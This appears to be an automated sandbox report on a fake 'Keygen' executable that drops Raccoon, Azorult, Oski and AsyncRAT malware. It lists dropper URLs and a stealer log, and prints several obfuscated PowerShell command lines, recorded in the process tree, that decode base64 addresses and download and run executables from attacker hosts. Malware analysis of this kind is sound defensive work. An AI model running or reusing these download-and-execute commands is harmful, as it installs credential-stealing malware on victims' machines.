Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

8

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

8

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    155s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (49) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 06:09:13 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (455 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 2 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 58 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (49) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (49) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1608
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\F46D.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (49) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1112
      • C:\Users\Admin\AppData\Local\Temp\F46D.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1868
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F46D.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1912
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1960
          • C:\Users\Public\hed.exe
            "C:\Users\Public\hed.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2716
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2844
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2196
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2196 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\551668842243414\\* & exit
                  8⤵
                    PID:1176
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2196
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2696
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2944
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2204
              • C:\Users\Public\hed.exe
                "C:\Users\Public\hed.exe"
                6⤵
                • Executes dropped EXE
                PID:2996
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F46D.tmp\m1.hta"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1816
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1956
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:1900
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\F46D.tmp\b.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:868
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2000
            • C:\Users\Public\ctx.exe
              "C:\Users\Public\ctx.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2552
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                6⤵
                • Loads dropped DLL
                PID:2236
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3032
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                    8⤵
                    • Loads dropped DLL
                    PID:1044
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2028
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
